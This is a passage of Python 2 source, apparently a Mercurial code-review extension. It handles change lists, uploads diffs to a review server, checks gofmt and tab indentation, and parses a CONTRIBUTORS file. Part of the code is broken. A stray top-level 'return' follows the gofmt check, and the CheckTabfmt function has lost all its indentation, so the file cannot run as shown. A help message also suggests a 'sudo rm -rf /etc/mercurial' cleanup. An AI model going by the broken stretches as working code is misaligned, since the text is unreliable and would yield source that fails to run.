# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
	"""Set Python's process-wide default encoding to UTF-8 (Python 2 only)."""
	import sys
	# Preserve stdout across reload(sys), which would otherwise reset it.
	stdout, __stdout__ = sys.stdout, sys.__stdout__
	reload(sys) # site.py deleted setdefaultencoding; get it back
	sys.stdout, sys.__stdout__ = stdout, __stdout__
	sys.setdefaultencoding('utf-8')
default_to_utf8()
#######################################################################
# Status printer for long-running commands
# Most recent status message; displayed periodically by StatusThread.
global_status = None
def set_status(s):
	"""Record s as the current status; echo it immediately when verbose."""
	# 'verbosity' is a module global set elsewhere from the command line.
	if verbosity > 0:
		print >>sys.stderr, time.asctime(), s
	global global_status
	global_status = s
class StatusThread(threading.Thread):
	"""Background thread that periodically prints the current status message."""
	def __init__(self):
		threading.Thread.__init__(self)
	def run(self):
		# pause a reasonable amount of time before
		# starting to display status messages, so that
		# most hg commands won't ever see them.
		time.sleep(30)
		# now show status every 15 seconds
		while True:
			# Align wakeups to 15-second wall-clock boundaries.
			time.sleep(15 - time.time() % 15)
			s = global_status
			if s is None:
				continue
			if s == "":
				s = "(unknown status)"
			print >>sys.stderr, time.asctime(), s
def start_status_thread():
	"""Launch the background status printer as a daemon thread."""
	worker = StatusThread()
	worker.setDaemon(True) # allowed to exit if worker is still running
	worker.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
# Placeholder diff uploaded when a CL is created before it has any files:
# Rietveld requires at least one patch in every patch set.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
	"""A change list: local file list plus metadata mirrored from the review server."""
	def __init__(self, name):
		typecheck(name, str)
		self.name = name          # CL number as a string, or "new"
		self.desc = ''            # change description
		self.files = []           # files in this CL
		self.reviewer = []        # reviewer addresses
		self.cc = []              # CC addresses
		self.url = ''             # server URL for this CL
		self.local = False        # has an on-disk cl.NNN file
		self.web = False          # has been synced with the server
		self.copied_from = None # None means current user
		self.mailed = False       # review mail has been sent
		self.private = False      # marked private on the server
		self.lgtm = []            # (who, message) approval/disapproval pairs
	def DiskText(self):
		"""Serialize the CL for the on-disk cl.NNN file."""
		cl = self
		s = ""
		if cl.copied_from:
			s += "Author: " + cl.copied_from + "\n\n"
		if cl.private:
			s += "Private: " + str(self.private) + "\n"
		s += "Mailed: " + str(self.mailed) + "\n"
		s += "Description:\n"
		s += Indent(cl.desc, "\t")
		s += "Files:\n"
		for f in cl.files:
			s += "\t" + f + "\n"
		typecheck(s, str)
		return s
	def EditorText(self):
		"""Serialize the CL for interactive editing (parsed back by ParseCL)."""
		cl = self
		s = _change_prolog
		s += "\n"
		if cl.copied_from:
			s += "Author: " + cl.copied_from + "\n"
		if cl.url != '':
			s += 'URL: ' + cl.url + ' # cannot edit\n\n'
		if cl.private:
			s += "Private: True\n"
		s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
		s += "CC: " + JoinComma(cl.cc) + "\n"
		s += "\n"
		s += "Description:\n"
		if cl.desc == '':
			s += "\t<enter description here>\n"
		else:
			s += Indent(cl.desc, "\t")
		s += "\n"
		if cl.local or cl.name == "new":
			s += "Files:\n"
			for f in cl.files:
				s += "\t" + f + "\n"
			s += "\n"
		typecheck(s, str)
		return s
	def PendingText(self, quick=False):
		"""Summarize the CL for "hg pending"; quick omits reviewers/CC/files."""
		cl = self
		s = cl.name + ":" + "\n"
		s += Indent(cl.desc, "\t")
		s += "\n"
		if cl.copied_from:
			s += "\tAuthor: " + cl.copied_from + "\n"
		if not quick:
			s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
			for (who, line) in cl.lgtm:
				s += "\t\t" + who + ": " + line + "\n"
			s += "\tCC: " + JoinComma(cl.cc) + "\n"
			s += "\tFiles:\n"
			for f in cl.files:
				s += "\t\t" + f + "\n"
		typecheck(s, str)
		return s
	def Flush(self, ui, repo):
		"""Write the CL to disk (atomically) and push metadata to the server."""
		if self.name == "new":
			self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
		dir = CodeReviewDir(ui, repo)
		path = dir + '/cl.' + self.name
		# Write to path+'!' then rename for atomic replacement.
		f = open(path+'!', "w")
		f.write(self.DiskText())
		f.close()
		if sys.platform == "win32" and os.path.isfile(path):
			os.remove(path)
		os.rename(path+'!', path)
		if self.web and not self.copied_from:
			EditDesc(self.name, desc=self.desc,
				reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
				private=self.private)
	def Delete(self, ui, repo):
		"""Remove the CL's on-disk file."""
		dir = CodeReviewDir(ui, repo)
		os.unlink(dir + "/cl." + self.name)
	def Subject(self):
		"""Build the mail subject from the first line of the description."""
		s = line1(self.desc)
		if len(s) > 60:
			s = s[0:55] + "..."
		if self.name != "new":
			s = "code review %s: %s" % (self.name, s)
		typecheck(s, str)
		return s
	def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
		"""Create or update the issue on the server, uploading diffs and base files."""
		if not self.files and not creating:
			ui.warn("no files in change list\n")
		if ui.configbool("codereview", "force_gofmt", True) and gofmt:
			CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
		set_status("uploading CL metadata + diffs")
		os.chdir(repo.root)
		form_fields = [
			("content_upload", "1"),
			("reviewers", JoinComma(self.reviewer)),
			("cc", JoinComma(self.cc)),
			("description", self.desc),
			("base_hashes", ""),
		]
		if self.name != "new":
			form_fields.append(("issue", self.name))
		vcs = None
		# We do not include files when creating the issue,
		# because we want the patch sets to record the repository
		# and base revision they are diffs against. We use the patch
		# set message for that purpose, but there is no message with
		# the first patch set. Instead the message gets used as the
		# new CL's overall subject. So omit the diffs when creating
		# and then we'll run an immediate upload.
		# This has the effect that every CL begins with an empty "Patch set 1".
		if self.files and not creating:
			vcs = MercurialVCS(upload_options, ui, repo)
			data = vcs.GenerateDiff(self.files)
			files = vcs.GetBaseFiles(data)
			if len(data) > MAX_UPLOAD_SIZE:
				uploaded_diff_file = []
				form_fields.append(("separate_patches", "1"))
			else:
				uploaded_diff_file = [("data", "data.diff", data)]
		else:
			uploaded_diff_file = [("data", "data.diff", emptydiff)]
		if vcs and self.name != "new":
			form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
		else:
			# First upload sets the subject for the CL itself.
			form_fields.append(("subject", self.Subject()))
		ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
		response_body = MySend("/upload", body, content_type=ctype)
		# Response: message line, then patchset id, then "fileid filename" pairs.
		patchset = None
		msg = response_body
		lines = msg.splitlines()
		if len(lines) >= 2:
			msg = lines[0]
			patchset = lines[1].strip()
			patches = [x.split(" ", 1) for x in lines[2:]]
		if response_body.startswith("Issue updated.") and quiet:
			pass
		else:
			ui.status(msg + "\n")
		set_status("uploaded CL metadata + diffs")
		if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
			raise hg_util.Abort("failed to update issue: " + response_body)
		issue = msg[msg.rfind("/")+1:]
		self.name = issue
		if not self.url:
			self.url = server_url_base + self.name
		if not uploaded_diff_file:
			# Diff was too large to inline; send per-file patches instead.
			set_status("uploading patches")
			patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
		if vcs:
			set_status("uploading base files")
			vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
		if send_mail:
			set_status("sending mail")
			MySend("/" + issue + "/mail", payload="")
		self.web = True
		set_status("flushing changes to disk")
		self.Flush(ui, repo)
		return
	def Mail(self, ui, repo):
		"""Send the review-request mail for this CL and mark it mailed."""
		pmsg = "Hello " + JoinComma(self.reviewer)
		if self.cc:
			pmsg += " (cc: %s)" % (', '.join(self.cc),)
		pmsg += ",\n"
		pmsg += "\n"
		repourl = ui.expandpath("default")
		if not self.mailed:
			pmsg += "I'd like you to review this change to\n" + repourl + "\n"
		else:
			pmsg += "Please take another look.\n"
		typecheck(pmsg, str)
		PostMessage(ui, self.name, pmsg, subject=self.Subject())
		self.mailed = True
		self.Flush(ui, repo)
def GoodCLName(name):
	"""Return a truthy match object when name is a valid CL number (digits only)."""
	typecheck(name, str)
	digits_only = "^[0-9]+$"
	return re.match(digits_only, name)
def ParseCL(text, name):
	"""Parse the EditorText/DiskText form back into a CL.

	Returns (cl, 0, '') on success, or (None, lineno, errmsg) on a parse error.
	"""
	typecheck(text, str)
	typecheck(name, str)
	sname = None   # name of the section currently being accumulated
	lineno = 0
	sections = {
		'Author': '',
		'Description': '',
		'Files': '',
		'URL': '',
		'Reviewer': '',
		'CC': '',
		'Mailed': '',
		'Private': '',
	}
	for line in text.split('\n'):
		lineno += 1
		line = line.rstrip()
		# '#' starts a comment line; blank/indented lines continue the section.
		if line != '' and line[0] == '#':
			continue
		if line == '' or line[0] == ' ' or line[0] == '\t':
			if sname == None and line != '':
				return None, lineno, 'text outside section'
			if sname != None:
				sections[sname] += line + '\n'
			continue
		# A non-indented "Name: value" line starts a new section.
		p = line.find(':')
		if p >= 0:
			s, val = line[:p].strip(), line[p+1:].strip()
			if s in sections:
				sname = s
				if val != '':
					sections[sname] += val + '\n'
				continue
		return None, lineno, 'malformed section header'
	for k in sections:
		sections[k] = StripCommon(sections[k]).rstrip()
	cl = CL(name)
	if sections['Author']:
		cl.copied_from = sections['Author']
	cl.desc = sections['Description']
	for line in sections['Files'].split('\n'):
		# Strip trailing '#' comments from file entries.
		i = line.find('#')
		if i >= 0:
			line = line[0:i].rstrip()
		line = line.strip()
		if line == '':
			continue
		cl.files.append(line)
	cl.reviewer = SplitCommaSpace(sections['Reviewer'])
	cl.cc = SplitCommaSpace(sections['CC'])
	cl.url = sections['URL']
	if sections['Mailed'] != 'False':
		# Odd default, but avoids spurious mailings when
		# reading old CLs that do not have a Mailed: line.
		# CLs created with this update will always have
		# Mailed: False on disk.
		cl.mailed = True
	if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
		cl.private = True
	if cl.desc == '<enter description here>':
		cl.desc = ''
	return cl, 0, ''
def SplitCommaSpace(s):
	"""Split a comma-separated string into a list, tolerating spaces after commas."""
	typecheck(s, str)
	trimmed = s.strip()
	if not trimmed:
		return []
	return re.split(", *", trimmed)
def CutDomain(s):
	"""Strip an @domain suffix from an address, if one is present."""
	typecheck(s, str)
	at = s.find('@')
	if at >= 0:
		return s[0:at]
	return s
def JoinComma(l):
	"""Join a list of str values with ", ", type-checking every element first."""
	for elem in l:
		typecheck(elem, str)
	return ", ".join(l)
def ExceptionDetail():
	"""Format the current exception as "TypeName: message" for display."""
	name = str(sys.exc_info()[0])
	# Unwrap the "<type '...'>" (old-style) or "<class '...'>" repr of the type.
	if name.startswith("<type '") and name.endswith("'>"):
		name = name[7:-2]
	elif name.startswith("<class '") and name.endswith("'>"):
		name = name[8:-2]
	detail = str(sys.exc_info()[1])
	if len(detail) > 0:
		name += ": " + detail
	return name
def IsLocalCL(ui, repo, name):
	"""Report whether a cl.NNN file for name exists in this repository."""
	return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
	"""Return (cl, '') for CL name, or (None, errmsg) on failure.

	Reads the on-disk cl.NNN file when present; when web is true, also
	fetches and merges the server's metadata for the issue.
	"""
	typecheck(name, str)
	set_status("loading CL " + name)
	if not GoodCLName(name):
		return None, "invalid CL name"
	dir = CodeReviewDir(ui, repo)
	path = dir + "cl." + name
	if os.access(path, 0):
		ff = open(path)
		text = ff.read()
		ff.close()
		cl, lineno, err = ParseCL(text, name)
		if err != "":
			return None, "malformed CL data: "+err
		cl.local = True
	else:
		cl = CL(name)
	if web:
		set_status("getting issue metadata from web")
		d = JSONGet(ui, "/api/" + name + "?messages=true")
		set_status(None)
		if d is None:
			return None, "cannot load CL %s from server" % (name,)
		if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
			return None, "malformed response loading CL data from code review server"
		cl.dict = d
		cl.reviewer = d.get('reviewers', [])
		cl.cc = d.get('cc', [])
		if cl.local and cl.copied_from and cl.desc:
			# local copy of CL written by someone else
			# and we saved a description. use that one,
			# so that committers can edit the description
			# before doing hg submit.
			pass
		else:
			cl.desc = d.get('description', "")
		cl.url = server_url_base + name
		cl.web = True
		cl.private = d.get('private', False) != False
		cl.lgtm = []
		# Collect (sender, first line) for every approval/disapproval message.
		for m in d.get('messages', []):
			if m.get('approval', False) == True or m.get('disapproval', False) == True:
				who = re.sub('@.*', '', m.get('sender', ''))
				text = re.sub("\n(.|\n)*", '', m.get('text', ''))
				cl.lgtm.append((who, text))
	set_status("loaded CL " + name)
	return cl, ''
class LoadCLThread(threading.Thread):
	"""Worker thread that loads one CL file; result lands in self.cl (or None)."""
	def __init__(self, ui, repo, dir, f, web):
		threading.Thread.__init__(self)
		self.ui = ui
		self.repo = repo
		self.dir = dir
		self.f = f      # filename of the form "cl.NNN"
		self.web = web
		self.cl = None
	def run(self):
		# f[3:] strips the "cl." prefix to get the CL number.
		cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
		if err != '':
			self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
			return
		self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
	"""Return a dict mapping CL name to CL for every cl.* file in the repo."""
	dir = CodeReviewDir(ui, repo)
	m = {}
	files = [f for f in os.listdir(dir) if f.startswith('cl.')]
	if not files:
		return m
	active = []
	first = True
	for f in files:
		t = LoadCLThread(ui, repo, dir, f, web)
		t.start()
		if web and first:
			# first request: wait in case it needs to authenticate
			# otherwise we get lots of user/password prompts
			# running in parallel.
			t.join()
			if t.cl:
				m[t.cl.name] = t.cl
			first = False
		else:
			active.append(t)
	for t in active:
		t.join()
		if t.cl:
			m[t.cl.name] = t.cl
	return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
	"""Return the repository root as a local filesystem path, or None."""
	url = repo.url()
	if not url.startswith('file:'):
		ui.warn("repository %s is not in local file system\n" % (url,))
		return None
	# Drop the "file:" scheme and any trailing slash.
	url = url[5:]
	if url.endswith('/'):
		url = url[:-1]
	typecheck(url, str)
	return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
	"""Return the path of .hg/codereview/ (with trailing '/'), creating it if needed."""
	dir = RepoDir(ui, repo)
	if dir == None:
		return None
	dir += '/.hg/codereview/'
	if not os.path.isdir(dir):
		try:
			os.mkdir(dir, 0700)
		except:
			ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
			return None
	typecheck(dir, str)
	return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
	"""Expand each leading tab of line to 8 spaces; the rest is untouched."""
	tabs = 0
	while tabs < len(line) and line[tabs] == '\t':
		tabs += 1
	return ' '*(8*tabs) + line[tabs:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
	"""Remove the longest white-space prefix shared by all non-blank lines of text."""
	typecheck(text, str)
	# First pass: compute the common prefix ws across non-blank lines.
	ws = None
	for line in text.split('\n'):
		line = line.rstrip()
		if line == '':
			continue
		line = TabsToSpaces(line)
		white = line[:len(line)-len(line.lstrip())]
		if ws == None:
			ws = white
		else:
			# Shrink ws to the longest prefix it shares with this line's indent.
			common = ''
			for i in range(min(len(white), len(ws))+1):
				if white[0:i] == ws[0:i]:
					common = white[0:i]
			ws = common
		if ws == '':
			break
	if ws == None:
		return text
	# Second pass: strip the prefix, dropping leading blank lines.
	t = ''
	for line in text.split('\n'):
		line = line.rstrip()
		line = TabsToSpaces(line)
		if line.startswith(ws):
			line = line[len(ws):]
		if line == '' and t == '':
			continue
		t += line + '\n'
	# Collapse trailing blank lines to a single newline.
	while len(t) >= 2 and t[-2:] == '\n\n':
		t = t[:-1]
	typecheck(t, str)
	return t
# Indent text with indent.
def Indent(text, indent):
	"""Prefix every '\\n'-separated line of text with indent; result ends with '\\n'."""
	typecheck(text, str)
	typecheck(indent, str)
	out = ''.join(indent + row + '\n' for row in text.split('\n'))
	typecheck(out, str)
	return out
# Return the first line of l
def line1(text):
	"""Return everything before the first newline in text."""
	typecheck(text, str)
	first, _, _ = text.partition('\n')
	return first
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
 # Ask a yes/no question; True iff the user picks yes (the default).
 choice = ui.promptchoice(msg, ["&yes", "&no"], 0)
 return choice == 0
def promptremove(ui, repo, f):
 # Offer to 'hg remove' f; warn if the removal command fails.
 if not promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
  return
 if hg_commands.remove(ui, repo, 'path:'+f) != 0:
  ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
 # Offer to 'hg add' f; warn if the add command fails.
 if not promptyesno(ui, "hg add %s (y/n)?" % (f,)):
  return
 if hg_commands.add(ui, repo, 'path:'+f) != 0:
  ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
 # Open cl in the user's editor and loop until the result parses cleanly
 # (or the user gives up). Returns "" on success, an error string otherwise.
 set_status(None) # do not show status
 s = cl.EditorText()
 while True:
  s = ui.edit(s, ui.username())
  # We can't trust Mercurial + Python not to die before making the change,
  # so, by popular demand, just scribble the most recent CL edit into
  # $(hg root)/last-change so that if Mercurial does die, people
  # can look there for their work.
  try:
   f = open(repo.root+"/last-change", "w")
   f.write(s)
   f.close()
  except:
   pass
  clx, line, err = ParseCL(s, cl.name)
  if err != '':
   if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
    return "change list not modified"
   continue
  # Check description.
  if clx.desc == '':
   if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
    continue
  elif re.search('<enter reason for undo>', clx.desc):
   if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
    continue
  elif not re.match(desc_re, clx.desc.split('\n')[0]):
   if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
    continue
  # Check file list for files that need to be hg added or hg removed
  # or simply aren't understood.
  pats = ['path:'+f for f in clx.files]
  changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
  deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
  unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
  ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
  clean = hg_matchPattern(ui, repo, *pats, clean=True)
  files = []
  # Classify each listed file and keep only the ones that make sense.
  for f in clx.files:
   if f in changed:
    files.append(f)
    continue
   if f in deleted:
    promptremove(ui, repo, f)
    files.append(f)
    continue
   if f in unknown:
    promptadd(ui, repo, f)
    files.append(f)
    continue
   if f in ignored:
    ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
    continue
   if f in clean:
    ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
    files.append(f)
    continue
   p = repo.root + '/' + f
   if os.path.isfile(p):
    ui.warn("warning: %s is a file but not known to hg\n" % (f,))
    files.append(f)
    continue
   if os.path.isdir(p):
    ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
    continue
   ui.warn("error: %s does not exist; omitting\n" % (f,))
  clx.files = files
  # Copy the accepted edit back into cl.
  cl.desc = clx.desc
  cl.reviewer = clx.reviewer
  cl.cc = clx.cc
  cl.files = clx.files
  cl.private = clx.private
  break
 return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, op="verb", defaultcc=None):
 # Returns (cl, err); err is "" on success.
 if len(pats) > 0 and GoodCLName(pats[0]):
  # First argument names an existing CL.
  if len(pats) != 1:
   return None, "cannot specify change number and file names"
  if opts.get('message'):
   return None, "cannot use -m with existing CL"
  cl, err = LoadCL(ui, repo, pats[0], web=True)
  if err != "":
   return None, err
 else:
  # No CL named: build a fresh one from the changed files matching pats.
  cl = CL("new")
  cl.local = True
  cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
  if not cl.files:
   return None, "no files changed (use hg %s <number> to use existing CL)" % op
 if opts.get('reviewer'):
  cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
 if opts.get('cc'):
  cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
 if defaultcc:
  cl.cc = Add(cl.cc, defaultcc)
 if cl.name == "new":
  # New CLs need a description: from -m, or interactively.
  if opts.get('message'):
   cl.desc = opts.get('message')
  else:
   err = EditCL(ui, repo, cl)
   if err != '':
    return None, err
 return cl, ""
#######################################################################
# Change list file management
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
 # taken maps file -> CL for files already claimed by another CL.
 taken = taken or {}
 # Run each pattern separately so that we can warn about
 # patterns that didn't do anything useful.
 for p in pats:
  for f in hg_matchPattern(ui, repo, p, unknown=True):
   promptadd(ui, repo, f)
  for f in hg_matchPattern(ui, repo, p, removed=True):
   promptremove(ui, repo, f)
  files = hg_matchPattern(ui, repo, p, modified=True, added=True, removed=True)
  for f in files:
   if f in taken:
    ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
  if not files:
   ui.warn("warning: %s did not match any modified files\n" % (p,))
 # Again, all at once (eliminates duplicates)
 l = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
 l.sort()
 if taken:
  # Exclude files that belong to other CLs.
  l = Sub(l, taken.keys())
 return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
 # Modified or added (but not removed) files, sorted by name.
 matched = hg_matchPattern(ui, repo, *pats, modified=True, added=True)
 return sorted(matched)
# Return list of files claimed by existing CLs
def Taken(ui, repo):
 # Map each file claimed by a local CL to that CL object.
 taken = {}
 for cl in LoadAllCL(ui, repo, web=False).values():
  for f in cl.files:
   taken[f] = cl
 return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
 # Changed files matching pats, excluding files already in some CL.
 claimed = Taken(ui, repo)
 return ChangedFiles(ui, repo, pats, taken=claimed)
#######################################################################
# File format checking.
def CheckFormat(ui, repo, files, just_warn=False):
 # Run both formatting checks; each warns (just_warn) or aborts on failure.
 set_status("running gofmt")
 CheckGofmt(ui, repo, files, just_warn)
 CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
 # Runs 'gofmt -l' over the Go files in files; warns (just_warn) or
 # aborts when any need reformatting or gofmt reports errors.
 files = gofmt_required(files)
 if not files:
  return
 cwd = os.getcwd()
 files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
 # Skip files that no longer exist / are unreadable.
 files = [f for f in files if os.access(f, 0)]
 if not files:
  return
 try:
  cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
 except:
  raise hg_util.Abort("gofmt: " + ExceptionDetail())
 # communicate() closes stdin and drains stdout and stderr concurrently.
 # The previous sequential stdout.read()/stderr.read() could deadlock if
 # gofmt filled the stderr pipe while we were still blocked on stdout.
 data, errors = cmd.communicate()
 set_status("done with gofmt")
 if len(errors) > 0:
  ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
  return
 if len(data) > 0:
  msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
  if just_warn:
   ui.warn("warning: " + msg + "\n")
  else:
   raise hg_util.Abort(msg)
 return
return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f) and not re.search(r"\.tab\.[ch]$", f)]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
badfiles = []
for f in files:
try:
for line in open(f, 'r'):
# Four leading spaces is enough to complain about,
# except that some Plan 9 code uses four spaces as the label indent,
# so allow that.
if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
badfiles.append(f)
break
except:
# ignore cannot open file, etc.
pass
if len(badfiles) > 0:
msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
#######################################################################
# CONTRIBUTORS file parsing
# Cache of the parsed CONTRIBUTORS map (filled on first ReadContributors call).
contributorsCache = None
# Optional URL to fetch CONTRIBUTORS from instead of the local checkout.
contributorsURL = None
def ReadContributors(ui, repo):
 # Parse CONTRIBUTORS (local file, or contributorsURL if set) into a dict
 # mapping lowercased email -> (name, primary email). Cached after the
 # first successful call; returns None (after a warning) on failure.
 global contributorsCache
 if contributorsCache is not None:
  return contributorsCache
 try:
  if contributorsURL is not None:
   opening = contributorsURL
   f = urllib2.urlopen(contributorsURL)
  else:
   opening = repo.root + '/CONTRIBUTORS'
   f = open(repo.root + '/CONTRIBUTORS', 'r')
 except:
  ui.write("warning: cannot open %s: %s\n" % (opening, ExceptionDetail()))
  return
 try:
  contributors = {}
  for line in f:
   # CONTRIBUTORS is a list of lines like:
   # Person <email>
   # Person <email> <alt-email>
   # The first email address is the one used in commit logs.
   if line.startswith('#'):
    continue
   m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
   if m:
    name = m.group(1)
    email = m.group(2)[1:-1]
    contributors[email.lower()] = (name, email)
    for extra in m.group(3).split():
     contributors[extra[1:-1].lower()] = (name, email)
 finally:
  # Close the file / HTTP response; the original leaked it.
  f.close()
 contributorsCache = contributors
 return contributors
def CheckContributor(ui, repo, user=None):
 # Abort unless user (default: configured username) appears in
 # CONTRIBUTORS; return the canonical "Name <email>" line.
 set_status("checking CONTRIBUTORS file")
 user, userline = FindContributor(ui, repo, user, warn=False)
 if userline:
  return userline
 raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
def FindContributor(ui, repo, user=None, warn=True):
 # Resolve user (or the configured username) against CONTRIBUTORS.
 # Returns (email, "Name <email>") on success, (lookup_key, None) if unknown.
 if not user:
  user = ui.config("ui", "username")
  if not user:
   raise hg_util.Abort("[ui] username is not configured in .hgrc")
 # Lookup key: the lowercased bare email, extracted from "Name <email>"
 # form when present.
 key = user.lower()
 m = re.match(r".*<(.*)>", key)
 if m:
  key = m.group(1)
 contributors = ReadContributors(ui, repo)
 if key not in contributors:
  if warn:
   ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (key,))
  return key, None
 name, email = contributors[key]
 return email, "%s <%s>" % (name, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial. It has proved the most stable as they make changes.
hgversion = hg_util.version()
# We require Mercurial 1.9 and suggest Mercurial 2.1.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.1"
# Message shown when the installed Mercurial is too old.
old_message = """
The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".
To install a new Mercurial, visit http://mercurial.selenic.com/downloads/.
"""
# Extra hint appended on Linux systems with a packaged Mercurial.
linux_message = """
You may need to clear your current Mercurial installation by running:
 sudo apt-get remove mercurial mercurial-common
 sudo rm -rf /etc/mercurial
"""
# NOTE(review): plain string comparison, so e.g. "10.0" < "1.9" would
# misfire; adequate for the version numbers current when this was written.
if hgversion < hg_required:
 msg = old_message
 if os.access("/etc/mercurial", 0):
  msg += linux_message
 raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
 # Capture ui output while silencing quiet/verbose settings.
 # Construct to start capturing; call output() once to restore the
 # settings and fetch the captured text.
 def __init__(self, ui):
  self.ui = ui
  ui.pushbuffer()
  self.saved_quiet = ui.quiet
  ui.quiet = True
  self.saved_verbose = ui.verbose
  ui.verbose = False
 def output(self):
  ui = self.ui
  ui.quiet = self.saved_quiet
  ui.verbose = self.saved_verbose
  return ui.popbuffer()
def to_slash(path):
 # On Windows, convert backslashes in path to forward slashes;
 # elsewhere the path is returned unchanged.
 if sys.platform != "win32":
  return path
 return path.replace('\\', '/')
def hg_matchPattern(ui, repo, *pats, **opts):
 # Run 'hg status' with the given patterns/options and return the
 # matched file names, relative to the repository root.
 w = uiwrap(ui)
 hg_commands.status(ui, repo, *pats, **opts)
 text = w.output()
 ret = []
 prefix = to_slash(os.path.realpath(repo.root))+'/'
